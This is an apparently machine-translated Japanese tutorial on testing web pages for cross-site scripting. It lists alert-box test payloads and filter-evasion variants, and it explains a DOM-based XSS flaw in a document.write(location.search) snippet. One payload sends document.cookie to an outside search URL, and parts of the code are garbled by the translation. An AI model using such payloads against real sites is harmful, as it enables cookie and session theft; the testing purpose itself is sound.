Windows system >> Windowsの知識 >  >> コンピュータソフトウェアのチュートリアル >> コンピュータソフトウェアのチュートリアルについて >> セキュリティテスト - クロスサイトスクリプティング(xss)

セキュリティテスト - クロスサイトスクリプティング(xss)

  
クロスサイトスクリプティングは、比較的重要かつ一般的なセキュリティの脆弱性です。クロスサイトスクリプティングとは、悪意のあるコードの入力を指し、プログラムがその入力と出力を検証しない場合、ブラウザは攻撃者によって制御されます。ユーザーのCookie、システム、ブラウザの情報を取得することができ、保存されたxssをフィッシングに使用してより多くのユーザー情報を取得することもできます。クロスサイトスクリプティングの最も一般的な方法は、< Script> alert(1)< /script>とそのさまざまな種類の< script> alert(1)< /script> entity%3Cscript%3Ealert(1)と入力します。 %3C /script%3E URLエンコード< scr< script> ipt> alert(1)< scr< script> ipt>< script x = 1> alert(1)< /script x = 1>このように書くか、< script>確認(1)< /script>< javascript。:alert(1)>;などページが送信後に警告ボックスでポップアップした場合、ページはxssの脆弱性を持ちます。つまり、コードを入力しても、元のプログラムの効果ではなく、実際のコードの効果がわかります。コードの一部< html>< body>< script> document.write(location.search);< /スクリプト> //location.searchがURLを返しますか?次のURLを入力すると、< /body>< /html>の最初の部分にhttp://127.0.0.1/attrck.html?search = 222と表示されます。 = 222;ただし、URLに/?search =< Script> alert(1)< /script>と入力すると、ページの実際のコードは次のようになります。document.write(?search =)< Script> alert (1)< /script>;という警告ボックスが表示されます。つまり、ページが最初に表示されるのではなく、コード< Script> alert(1)< /script>が実行されますか?投稿文字列の効果として偽造URLを使用できます。例1ではdocument.cookie =(" name = 123")を追加してユーザーのCookieを取得し、Cookieを設定してから、次のようにURLを構成して、渡されるlocalhostドメインCookieを実装し、http://127.0.0.1を検索します。 /attrck.html?search=<script>window.open("http://www.baidu.com/s?wd="+document.cookie)< /script>< /script> Cookieはクロスドメインアクセスを禁止されているため*偽のURLは、ブラウザはlocalhostドメインと見なされます*保存されたxssは、悪意のあるコードを含む記事を公開するなど、悪意のあるコードをサーバーに保存することを意味します。この記事の例もdomベースで、ページのdomオブジェクトモデルを変更して攻撃を仕掛ける例で、document.write \\ document.writeln \\ innerhtmlなどのdomメソッドが使用されています。 Domベースのxss、xssの脆弱性を見つける手動入力の一般的な使用、入力制約、フィルタリング、長さの制限などの要因を考慮する必要があるので、テスト結果を達成するためにさまざまな可変入力を設計する必要があります。 xssは表示可能なページ入力に限定されず、フォームフィールドを隠したり、リクエストパラメータを取得したりすることができるので、テストするためにブラウザに再送信します。この記事は[System Home] www.xp85.comから来ています
Copyright © Windowsの知識 All Rights Reserved